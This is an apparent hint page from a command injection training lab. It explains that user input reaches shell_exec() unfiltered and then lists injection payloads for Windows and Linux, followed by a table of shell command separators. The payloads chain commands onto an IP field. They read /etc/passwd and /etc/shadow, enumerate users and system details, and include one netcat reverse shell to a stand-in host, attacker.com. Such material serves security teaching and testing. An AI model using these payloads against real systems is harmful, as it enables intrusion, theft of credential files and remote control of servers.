๐ฏ Vulnerability Info
Type: OS Command Injection
Severity: Critical
๐ก How to Exploit
- User input is passed directly to shell_exec()
- Command separators allow chaining commands
- Can execute any system command
๐งช Windows Payloads
127.0.0.1 && whoami
127.0.0.1 | dir
127.0.0.1 & net user
127.0.0.1 && type C:\Windows\win.ini
127.0.0.1 | systeminfo
127.0.0.1 && ipconfig /all
| dir C:\
& echo VULNERABLE
๐งช Linux Payloads
127.0.0.1; id
127.0.0.1 | cat /etc/passwd
127.0.0.1 && uname -a
127.0.0.1; ls -la /
127.0.0.1 | whoami
; cat /etc/shadow
| nc -e /bin/sh attacker.com 4444
๐ Command Separators
; - Command separator (Linux)
&& - AND operator
|| - OR operator
| - Pipe output
& - Background execution (Windows)
`cmd` - Command substitution
$(cmd) - Command substitution